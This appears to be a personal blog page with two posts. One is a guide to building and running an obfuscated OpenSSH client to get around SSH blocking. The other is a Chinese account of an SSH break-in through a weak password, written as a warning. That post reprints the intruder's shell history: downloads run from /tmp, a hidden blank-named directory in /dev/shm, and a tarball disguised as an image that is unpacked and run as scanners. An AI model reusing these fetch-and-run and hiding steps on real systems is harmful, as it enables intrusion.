Obfuscated ssh Client under Linux

SSH is a powerful tool not only for astronomers. We often use it to download observation data from the observatory’s server or run some complicated programs on remote (overseas) servers. But for the reason as we all know, the SSH tunnels are always being obstructed. So we need some technique to get over such obstruction. Therefore, the obfuscated SSH turns out to be a sufficient method.

I will describe how to use obfuscated SSH_TUNNEL under Linux as below:
(Original Code: Here)

INSTALLATION:

wget http://aenes.googlecode.com/files/brl-obfuscated-openssh.zip
unzip brl-obfuscated-openssh.zip
cd ./brl-obfuscated*
./configure  --prefix=/usr/local/newssh --sysconfdir=/etc/newssh
make
make install

Then you need to configure the ssh server following the guide here.

USAGE:
Then use this to run the ssh client:

/usr/local/newssh/bin/ssh -N -v -Z ObfuscateKeyWord -p ***** username@hostname -D 127.0.0.1:7070

There are 4 parameters you need to specify: “ObfuscateKeyWord” is the obfuscated keyword you set in the configuration file (sshd_config) of the server, “*****” is the ssh server port number, “username” and “hostname” are as the name described.

亲身经历了一次Hack攻击

刚才突然发现网络出现异常(出现一些异常的流量),遂调用who命令突然发现iraf用户被人通过ssh登录……都怪我一时疏忽大意,居然给iraf 设置了一个那么简单的密码,而且还开了ssh。结果突然就发现了一个95.77.21.239的IP登录了。我一下子意识到,自己是被黑客攻击了。接着我查了ip归属地,居然是罗马尼亚……肯定只是个幌子。根据和某个高手朋友的结果,鉴定出好在这个黑客不是个高手……如果是的话,我的电脑早就要重装了。然后我查看了一下shell的history发现了如下的操作历史

wget
cd /tmp
chmod +x *
./bash
uname -a
 
wget
tar
cat /etc/issue
cd /dev/shm
mkdir "  "
cd "  "
wget ***; tar zxvf fb.jpg ; rm -rf fb.jpg ; cd fb ; chmod 777 * ; (为了安全起见,我没有贴出链接)
./0-100 196
./100-200 196
cd /dev/shm
w
cd "  "
ls -a
cd fb
ls -a
cat log*
./100-200 196
ls -a
cat log*
./0-100 213
cd fb
cd /dev/shm
ls
cat /proc/cpuinfo
cd /dev/shm
./0-100 213
cd fb

之后我的iraf用户就出现了无数个ftp_scanner命令……幸好我及时发现……然后把他干的好事逆操作一遍……接着杀掉了所有iraf的进程,删除了iraf用户……目前可能没问题了,前提是如果他的操作只停留在shell层面。在这里提醒大家一定要注意linux用户的密码管理,不能疏忽大意。我的个人案例供警示。